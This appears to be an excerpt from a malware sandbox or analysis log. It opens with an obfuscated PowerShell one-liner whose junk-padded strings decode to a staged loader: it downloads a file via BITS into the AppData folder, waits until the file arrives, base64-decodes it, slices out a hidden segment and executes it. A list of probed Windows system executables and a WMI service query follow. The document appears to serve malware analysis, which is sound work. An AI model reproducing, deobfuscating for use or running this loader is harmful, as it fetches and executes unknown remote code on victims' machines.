Udsl-Gadee BalqNarr Rich8Mary) Mar ') ;if ($Terrapins) {.$Rush $Ekso;} else {;$Iongitr00=Cintereye9 ' Lans Rost Bloastopr BuntEsco-KontB numisupet RidsEkstTPlagr FeaaAbstnForvssubsfUndeestenrFrem reun-GamisNuveoCadiuultrrFogmc ConeComp Pseu$DuopMUnphesultdZiggiNaal Brot-MellDBasaesigjs InctPediiEmannRefoaUnpet TiniUnslo PapnDamp schi$ PapG svii KalbinklbAntie Meas stov MediMiligBard2 Flu ';.($Iongitr01) (Cintereye9 'Ubes$skygGHagei Hoybbrinb TwieKlicsLifevInteistifg Hep2 Nit=Udbr$ stieOximn Gumv Rep: telaHibipFluopsenidstraa BudtReopasyno ') ;.($Iongitr01) (Cintereye9 'TilbIMissmforepsniro Tryr GlitImpl-OverM UsloLiggdClimuAlmilOldee Tol methBBdepiGarvtgrelsPlumTsipir thwaDescn RetsHibefsamee HekrEksp ') ;$Gibbesvig2=$Gibbesvig2+'\Fractiong.stu';while (-not $Preternat) {.($Iongitr01) (Cintereye9 ' Rat$ unaPInsurOveredomitNatteManorBritnPolia smetPred= Bes( BarTEnqueKlunssheetGift- skrP disa CantDaarhTors skos$ InfGFintiIleibBerib Uroe Ides scav MariArsegGram2Turb)Livs ') ;.($Iongitr01) $Iongitr00;.($Iongitr01) (Cintereye9 ' ekss BeftslagaCharr scrtKoge-HockskloalKhaneDumpe RespPela Mask5 Udg ');}.($Iongitr01) (Cintereye9 'Deca$ AtoC Pagi LatnTweetBerleRenhr CuteFasayKoageAngl Eric=Pent DjvG Pere smrtMeek-OverCImpro Benn HydtNarre AlunTekst Til Legi$OdioGungdiVanfbBrunb ExheMarmsArtiv GloiRipog Til2 Dru ');.($Iongitr01) (Cintereye9 ' For$FinaR RygePuntn InwlPhotiAfluv brn Reti=Anti Ger[Tasassociy shosstartnecressttm Alo.PameC ProoRenhn Monv ManesubirRefothund] Bal:Noti:TrawF ReprAlaro ChomPatsB spoa DgnsEnaleBill6 Pen4DannssupetLderr Fori Unin WeigKnip(Bese$storC Fori Eskn Palt Fise sekr Peresugey octeUnde) Cam ');.($Iongitr01) (Cintereye9 ' Ufr$tunfIGullo InvnspergPrefiRevit ConrIntr2 rel Ansk= Rot Annu[scopsFuguy FensKulitEctoe CremRetr.ArseT MaseHypoxrefottaun. KonE nonnsalvc TraoOverdKiloiskiln AftgArch] Coc:Fjer:DoctA Ters PreCCronIKautI sno.NonaGHyste sodtVaris kuktAfmarDataiskspn Colg Cla(supe$stilR supeCaudn Gull LyniDivavskol) Ben ');.($Iongitr01) (Cintereye9 'Rink$ sogVImmuiKjerc Besk Unissmreb Banusnyd= Gra$KonsI Urgo svenOutcgProvismokt Yakr mea2Frds.Rects MenuHebrb BogsRentt IndrInveiRappnAbstg Fas(Radi2 Ove1Dors3Glem4 Lat8slet1 Pre,strk2Wall8 ble0Opgi0surf8Lage) Ord ');.($Iongitr01) $Vicksbu;}"
wmi Select * from Win32_Service
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe